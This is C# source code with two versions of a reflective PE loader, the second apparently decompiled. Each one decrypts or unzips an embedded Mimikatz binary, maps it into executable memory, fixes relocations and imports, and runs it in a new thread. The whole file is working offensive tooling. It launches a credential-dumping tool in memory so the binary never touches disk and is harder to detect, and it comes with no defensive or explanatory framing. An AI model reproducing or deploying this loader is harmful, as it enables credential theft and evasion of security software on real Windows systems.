public static void Exec()
{
byte[] latestMimikatz = null;
try
{
//Use Misc Class to encrypt your own files
if (IntPtr.Size == 8)
{
//x64 Unpack And Execute
latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex64), "password"); //Yes, this is a bad idea.
}
else if (IntPtr.Size == 4)
{
//x86 Unpack And Execute
latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex86), "password"); //Yes, this is a bad idea.
}
}
catch (Exception ex)
{
while (ex != null)
{
Console.WriteLine(ex.Message);
ex = ex.InnerException;
}
}
Console.WriteLine("Downloaded Latest");
PELoader pe = new PELoader(latestMimikatz);
IntPtr codebase = IntPtr.Zero;
if (pe.Is32BitHeader)
{
Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
}
else
{
Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
}
//Copy Sections
for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
{
IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
}
//Perform Base Relocation
//Calculate Delta
IntPtr currentbase = codebase;
long delta;
if (pe.Is32BitHeader)
{
delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
}
else
{
delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
}
Console.WriteLine("Delta = {0}", delta.ToString("X4"));
//Modify Memory Based On Relocation Table
IntPtr relocationTable;
if (pe.Is32BitHeader)
{
relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
}
else
{
relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
}
NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr nextEntry = relocationTable;
int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
IntPtr offset = relocationTable;
while (true)
{
NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock);
relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress);
for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
{
IntPtr patchAddr;
UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
UInt16 type = (UInt16)(value >> 12);
UInt16 fixup = (UInt16)(value & 0xfff);
switch (type)
{
case 0x0:
break;
case 0x3:
patchAddr = IntPtrAdd(dest, fixup);
//Add Delta To Location.
int originalx86Addr = Marshal.ReadInt32(patchAddr);
Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
break;
case 0xA:
patchAddr = IntPtrAdd(dest, fixup);
//Add Delta To Location.
long originalAddr = Marshal.ReadInt64(patchAddr);
Marshal.WriteInt64(patchAddr, originalAddr + delta);
break;
}
}
offset = IntPtrAdd(relocationTable, sizeofNextBlock);
sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
relocationEntry = relocationNextEntry;
nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock);
if (relocationNextEntry.SizeOfBlock == 0)
{
break;
}
}
//Resolve Imports
IntPtr z;
IntPtr oa1;
int oa2;
if (pe.Is32BitHeader)
{
z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
}
else
{
z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
}
//Get And Display Each DLL To Load
IntPtr threadStart;
IntPtr hThread;
if (pe.Is32BitHeader)
{
int j = 0;
while (true) //HardCoded Number of DLL's Do this Dynamically.
{
IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "")
{
break;
}
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
Console.WriteLine("Loaded {0}", DllName);
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt32(a2, (int)funcAddy);
a2 = IntPtrAdd(a2, 4);
if (DllFuncName == "")
{
break;
}
k++;
}
j++;
}
//Transfer Control To OEP
Console.WriteLine("Executing Mimikatz");
threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
Console.WriteLine("Thread Complete");
}
else
{
int j = 0;
while (true)
{
IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "")
{
break;
}
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
Console.WriteLine("Loaded {0}", DllName);
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
//Console.WriteLine("Function {0}", DllFuncName);
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt64(a2, (long)funcAddy);
a2 = IntPtrAdd(a2, 8);
if (DllFuncName == "")
{
break;
}
k++;
}
j++;
}
//Transfer Control To OEP
Console.WriteLine("Executing Mimikatz");
threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
Console.WriteLine("Thread Complete");
}
//Transfer Control To OEP
Console.WriteLine("Thread Complete");
//Console.ReadLine();
} //End Main
// Token: 0x06000003 RID: 3 RVA: 0x00002064 File Offset: 0x00000264
public static void Exec()
{
byte[] fileBytes = null;
try
{
byte[] buffer = Misc.Decrypt(Convert.FromBase64String(Package.file), "password");
Stream stream = new MemoryStream(buffer);
ZipArchive zipArchive = new ZipArchive(stream);
foreach (ZipArchiveEntry current in zipArchive.Entries)
{
if (IntPtr.Size == 8 && current.FullName == "x64/mimikatz.exe")
{
Console.WriteLine(current.FullName);
Stream input = current.Open();
fileBytes = Misc.ReadFully(input);
}
else if (IntPtr.Size == 4 && current.FullName == "Win32/mimikatz.exe")
{
Console.WriteLine(current.FullName);
Stream input = current.Open();
fileBytes = Misc.ReadFully(input);
}
}
}
catch (Exception innerException)
{
while (innerException != null)
{
Console.WriteLine(innerException.Message);
innerException = innerException.InnerException;
}
}
Console.WriteLine("Downloaded Latest");
PELoader pELoader = new PELoader(fileBytes);
IntPtr intPtr = IntPtr.Zero;
if (pELoader.Is32BitHeader)
{
string arg_174_0 = "Preferred Load Address = {0}";
uint num = pELoader.OptionalHeader32.ImageBase;
Console.WriteLine(arg_174_0, num.ToString("X4"));
intPtr = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pELoader.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
string arg_1C7_0 = "Allocated Space For {0} at {1}";
num = pELoader.OptionalHeader32.SizeOfImage;
Console.WriteLine(arg_1C7_0, num.ToString("X4"), intPtr.ToString("X4"));
}
else
{
string arg_1F0_0 = "Preferred Load Address = {0}";
ulong imageBase = pELoader.OptionalHeader64.ImageBase;
Console.WriteLine(arg_1F0_0, imageBase.ToString("X4"));
intPtr = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pELoader.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
string arg_243_0 = "Allocated Space For {0} at {1}";
uint num = pELoader.OptionalHeader64.SizeOfImage;
Console.WriteLine(arg_243_0, num.ToString("X4"), intPtr.ToString("X4"));
}
for (int i = 0; i < (int)pELoader.FileHeader.NumberOfSections; i++)
{
IntPtr destination = NativeDeclarations.VirtualAlloc(IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[i].VirtualAddress), pELoader.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Marshal.Copy(pELoader.RawBytes, (int)pELoader.ImageSectionHeaders[i].PointerToRawData, destination, (int)pELoader.ImageSectionHeaders[i].SizeOfRawData);
Console.WriteLine("Section {0}, Copied To {1}", new string(pELoader.ImageSectionHeaders[i].Name), destination.ToString("X4"));
}
IntPtr intPtr2 = intPtr;
long num2;
if (pELoader.Is32BitHeader)
{
num2 = (long)(intPtr2.ToInt32() - (int)pELoader.OptionalHeader32.ImageBase);
}
else
{
num2 = intPtr2.ToInt64() - (long)pELoader.OptionalHeader64.ImageBase;
}
Console.WriteLine("Delta = {0}", num2.ToString("X4"));
IntPtr intPtr3;
if (pELoader.Is32BitHeader)
{
intPtr3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.BaseRelocationTable.VirtualAddress);
}
else
{
intPtr3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.BaseRelocationTable.VirtualAddress);
}
NativeDeclarations.IMAGE_BASE_RELOCATION iMAGE_BASE_RELOCATION = default(NativeDeclarations.IMAGE_BASE_RELOCATION);
iMAGE_BASE_RELOCATION = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(intPtr3, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
int num3 = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr pointer = intPtr3;
int num4 = (int)iMAGE_BASE_RELOCATION.SizeOfBlock;
IntPtr ptr = intPtr3;
NativeDeclarations.IMAGE_BASE_RELOCATION iMAGE_BASE_RELOCATION2;
do
{
iMAGE_BASE_RELOCATION2 = default(NativeDeclarations.IMAGE_BASE_RELOCATION);
IntPtr ptr2 = IntPtr.Add(intPtr3, num4);
iMAGE_BASE_RELOCATION2 = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(ptr2, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr pointer2 = IntPtr.Add(intPtr, (int)iMAGE_BASE_RELOCATION.VirtualAdress);
for (int i = 0; i < (int)(((ulong)iMAGE_BASE_RELOCATION.SizeOfBlock - (ulong)((long)num3)) / 2uL); i++)
{
ushort num5 = (ushort)Marshal.ReadInt16(ptr, 8 + 2 * i);
ushort num6 = (ushort)(num5 >> 12);
ushort offset = num5 & 4095;
ushort num7 = num6;
if (num7 != 0)
{
if (num7 != 3)
{
if (num7 == 10)
{
IntPtr ptr3 = IntPtr.Add(pointer2, (int)offset);
long num8 = Marshal.ReadInt64(ptr3);
Marshal.WriteInt64(ptr3, num8 + num2);
}
}
else
{
IntPtr ptr3 = IntPtr.Add(pointer2, (int)offset);
int num9 = Marshal.ReadInt32(ptr3);
Marshal.WriteInt32(ptr3, num9 + (int)num2);
}
}
}
ptr = IntPtr.Add(intPtr3, num4);
num4 += (int)iMAGE_BASE_RELOCATION2.SizeOfBlock;
iMAGE_BASE_RELOCATION = iMAGE_BASE_RELOCATION2;
pointer = IntPtr.Add(pointer, num4);
}while (iMAGE_BASE_RELOCATION2.SizeOfBlock != 0u);
int num10;
if (pELoader.Is32BitHeader)
{
IntPtr intPtr4 = IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[1].VirtualAddress);
IntPtr pointer3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.ImportTable.VirtualAddress);
num10 = Marshal.ReadInt32(IntPtr.Add(pointer3, 16));
}
else
{
IntPtr intPtr4 = IntPtr.Add(intPtr, (int)pELoader.ImageSectionHeaders[1].VirtualAddress);
IntPtr pointer3 = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.ImportTable.VirtualAddress);
num10 = Marshal.ReadInt32(IntPtr.Add(pointer3, 16));
}
if (pELoader.Is32BitHeader)
{
int num11 = 0;
while (true)
{
IntPtr pointer4 = IntPtr.Add(intPtr, 20 * num11 + (int)pELoader.OptionalHeader32.ImportTable.VirtualAddress);
int num12 = Marshal.ReadInt32(IntPtr.Add(pointer4, 16));
IntPtr intPtr5 = IntPtr.Add(intPtr, (int)(pELoader.ImageSectionHeaders[1].VirtualAddress + (uint)(num12 - num10)));
IntPtr ptr4 = IntPtr.Add(intPtr, Marshal.ReadInt32(IntPtr.Add(pointer4, 12)));
string text = Marshal.PtrToStringAnsi(ptr4);
if (text == "")
{
break;
}
IntPtr hModule = NativeDeclarations.LoadLibrary(text);
Console.WriteLine("Loaded {0}", text);
int num13 = 0;
while (true)
{
IntPtr pointer5 = IntPtr.Add(intPtr, Marshal.ReadInt32(intPtr5));
string text2 = Marshal.PtrToStringAnsi(IntPtr.Add(pointer5, 2));
IntPtr procAddress = NativeDeclarations.GetProcAddress(hModule, text2);
Marshal.WriteInt32(intPtr5, (int)procAddress);
intPtr5 = IntPtr.Add(intPtr5, 4);
if (text2 == "")
{
break;
}
num13++;
}
num11++;
}
Console.WriteLine("Executing Mimikatz");
IntPtr lpStartAddress = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader32.AddressOfEntryPoint);
IntPtr hHandle = NativeDeclarations.CreateThread(IntPtr.Zero, 0u, lpStartAddress, IntPtr.Zero, 0u, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hHandle, 4294967295u);
Console.WriteLine("Thread Complete");
}
else
{
int num11 = 0;
while (true)
{
IntPtr pointer4 = IntPtr.Add(intPtr, 20 * num11 + (int)pELoader.OptionalHeader64.ImportTable.VirtualAddress);
int num12 = Marshal.ReadInt32(IntPtr.Add(pointer4, 16));
IntPtr intPtr5 = IntPtr.Add(intPtr, (int)(pELoader.ImageSectionHeaders[1].VirtualAddress + (uint)(num12 - num10)));
IntPtr ptr4 = IntPtr.Add(intPtr, Marshal.ReadInt32(IntPtr.Add(pointer4, 12)));
string text = Marshal.PtrToStringAnsi(ptr4);
if (text == "")
{
break;
}
IntPtr hModule = NativeDeclarations.LoadLibrary(text);
Console.WriteLine("Loaded {0}", text);
int num13 = 0;
while (true)
{
IntPtr pointer5 = IntPtr.Add(intPtr, Marshal.ReadInt32(intPtr5));
string text2 = Marshal.PtrToStringAnsi(IntPtr.Add(pointer5, 2));
IntPtr procAddress = NativeDeclarations.GetProcAddress(hModule, text2);
Marshal.WriteInt64(intPtr5, (long)procAddress);
intPtr5 = IntPtr.Add(intPtr5, 8);
if (text2 == "")
{
break;
}
num13++;
}
num11++;
}
Console.WriteLine("Executing Mimikatz");
IntPtr lpStartAddress = IntPtr.Add(intPtr, (int)pELoader.OptionalHeader64.AddressOfEntryPoint);
IntPtr hHandle = NativeDeclarations.CreateThread(IntPtr.Zero, 0u, lpStartAddress, IntPtr.Zero, 0u, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hHandle, 4294967295u);
Console.WriteLine("Thread Complete");
}
Console.WriteLine("Thread Complete");
}